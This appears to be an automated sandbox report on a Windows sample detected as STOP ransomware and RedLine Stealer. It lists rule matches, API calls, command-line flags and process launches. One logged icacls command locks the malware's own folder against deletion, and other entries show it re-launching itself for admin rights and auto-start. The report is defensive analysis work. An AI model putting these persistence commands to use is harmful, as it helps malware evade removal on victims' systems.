        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 5.2.C0XWmZAnYk.exe.c115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 7.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 7.2.C0XWmZAnYk.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 4.2.C0XWmZAnYk.exe.cb15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0.2.C0XWmZAnYk.exe.c315a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 11.2.C0XWmZAnYk.exe.ca15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000005.00000002.2099680252.0000000000B79000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.2046446224.0000000000A53000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000002.00000002.2063565086.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 0000000B.00000002.2265091941.0000000000945000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000004.00000002.2081980325.0000000000A6D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000000.00000002.2051236727.0000000000C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000009.00000002.2202239732.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000006.00000002.2682465717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000008.00000002.2184694320.0000000000B0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
        Source: 00000008.00000002.2184814046.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000B.00000002.2265343028.0000000000CA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000004.00000002.2082279844.0000000000CB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000005.00000002.2099768264.0000000000C10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 0000000C.00000002.2276616729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: 00000007.00000002.3281167652.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 1400, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 3208, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6512, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 7084, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 2684, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6776, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 4536, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6360, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 6984, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: Process Memory Space: C0XWmZAnYk.exe PID: 5260, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
        Source: classification engineClassification label: mal100.rans.spre.troj.spyw.evad.winEXE@18/1343@7/2
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_00411900 GetLastError,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,_memset,lstrcpynW,MessageBoxW,LocalFree,LocalFree,LocalFree,2_2_00411900
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 0_2_00A537C6 CreateToolhelp32Snapshot,Module32First,0_2_00A537C6
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCode function: 2_2_0040D240 CoInitialize,CoInitializeSecurity,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,CoUninitialize,CoUninitialize,CoUninitialize,__time64,__localtime64,_wcsftime,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,swprintf,CoUninitialize,CoUninitialize,2_2_0040D240
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\geo[1].jsonJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: --ForNetRes2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: IsAutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: IsTask2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: --Task2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: --AutoStart2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: --Service2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: X1P2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: --Admin2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: runas2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: x2Q2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: x*P2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: C:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: D:\Windows\2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: 7P2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: %username%2_2_00419F90
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeCommand line argument: F:\2_2_00419F90
        Source: C0XWmZAnYk.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C0XWmZAnYk.exeReversingLabs: Detection: 86%
        Source: C0XWmZAnYk.exeString found in binary or memory: set-addPolicy
        Source: C0XWmZAnYk.exeString found in binary or memory: id-cmc-addExtensions
        Source: C0XWmZAnYk.exeString found in binary or memory: set-addPolicy
        Source: C0XWmZAnYk.exeString found in binary or memory: id-cmc-addExtensions
        Source: C0XWmZAnYk.exeString found in binary or memory: set-addPolicy
        Source: C0XWmZAnYk.exeString found in binary or memory: id-cmc-addExtensions
        Source: C0XWmZAnYk.exeString found in binary or memory: set-addPolicy
        Source: C0XWmZAnYk.exeString found in binary or memory: id-cmc-addExtensions
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeFile read: C:\Users\user\Desktop\C0XWmZAnYk.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe"
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe"
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTask
        Source: unknownProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --Task
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTask
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --Task
        Source: unknownProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: unknownProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe"Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808" /deny *S-1-1-0:(OI)(CI)(DE,DC)Jump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\Desktop\C0XWmZAnYk.exeProcess created: C:\Users\user\Desktop\C0XWmZAnYk.exe "C:\Users\user\Desktop\C0XWmZAnYk.exe" --Admin IsNotAutoStart IsNotTaskJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe --TaskJump to behavior
        Source: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exeProcess created: C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe "C:\Users\user\AppData\Local\ccb7158d-ff04-4c1f-b136-48fca8d3c808\C0XWmZAnYk.exe" --AutoStart
